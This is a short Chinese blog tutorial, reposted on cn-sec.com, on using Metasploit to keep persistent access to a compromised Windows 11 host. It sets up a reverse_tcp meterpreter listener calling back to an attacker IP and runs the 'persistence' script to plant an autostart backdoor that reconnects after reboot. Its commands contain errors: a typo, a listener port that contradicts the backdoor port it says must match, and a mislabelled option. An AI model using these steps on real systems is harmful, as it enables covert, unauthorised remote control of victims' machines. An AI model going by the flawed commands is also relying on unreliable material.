浅谈Msfconsole持久话(一)

admin 2024年2月23日23:19:22评论14 views字数 779阅读2分35秒阅读模式

我们在利用msfconsole获取系统权限后。若系统进行了关机或者重启,我们与目标建立联系就显得很困难。于是我们需要想办法达到“持久化”效果。本文简单的介绍msf自带脚本与目标达到持久化效果。

实验环境

  • kali Linux(攻击者)
  • Win11 (受害者)

获取系统Shell

我们利用msf先通过攻击获取一个 meterpreter shell

msfpc windows

浅谈Msfconsole持久话(一)配置监听

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.50.84
set LPORT 443
run -j

配置完成后,运行目标程序。如下成功得到shell

浅谈Msfconsole持久话(一)

持久化

1.获得 meterpreter shell 之后,输入

run persistence -A -S -U -i 5 -p 5555 -r 192.168.50.84

命令语法:

  • -A:自动启动Payload程序

  • -S:系统登录时自动加载

  • -U:用户登录时自动启动

  • -X:开机时自动加载

  • -i:回连的时间间隔

  • -P:监听反向连接端口号

  • -r:目标机器 IP 地址(攻击主机)

执行结束后,可以获得persistence后门,同时会创建一个新的会话,然后将攻击主机(kali)重启。kali输入

use exploit/multi/handler
et payload windows/meterpreter/reverse_tcp
set LHOST 192.168.50.84
set LPORT 4444(端口要和上面的persistence后门端口一致)
run

这样,即使重新启动计算机,此时使用计算机将允许自动重新与目标系统建立连接, 不必每次都需要进行配置才能取得shell。

原文始发于微信公众号(kali笔记):浅谈Msfconsole持久话(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日23:19:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浅谈Msfconsole持久话(一)https://cn-sec.com/archives/2114066.html

发表评论

匿名网友 填写信息